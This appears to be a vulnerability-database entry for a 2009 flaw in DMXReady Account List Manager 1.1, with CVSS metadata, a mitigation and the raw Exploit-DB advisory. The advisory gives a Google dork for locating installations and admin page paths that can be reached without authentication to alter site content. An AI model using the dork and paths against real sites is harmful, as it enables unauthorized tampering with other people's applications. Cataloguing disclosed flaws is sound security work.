DMXReady Account List Manager

vendor:

Account List Manager

by:

ajann

7.5

CVSS

HIGH

Remote Contents Change Vulnerability

264

CWE

Product Name: Account List Manager

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:dmxready:account_list_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DMXReady Account List Manager <= 1.1 Remote Contents Change Vulnerability

A vulnerability in DMXReady Account List Manager version 1.1 allows remote attackers to change the contents of the application. An attacker can exploit this vulnerability by sending a malicious request to the add_category.asp page. This will allow the attacker to insert a new category into the application.

Mitigation:

Upgrade to the latest version of DMXReady Account List Manager.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  DMXReady Account List Manager <= 1.1 Remote Contents Change Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  49.97 $
# Dork    :  inurl:inc_accountlistmanager.asp
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_accountlistmanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

Permissions:
Update
Delete
Insert Category

# http://[target]/[path]/admin/AccountListManager/add_category.asp

Example: 
You Find -> http://[target]/[path]//applications/AccountListManager/inc_accountlistmanager.asp
Edit  ->    http://[target]/[path]//admin/AccountListManager/add_category.asp

 :)

# milw0rm.com [2009-01-13]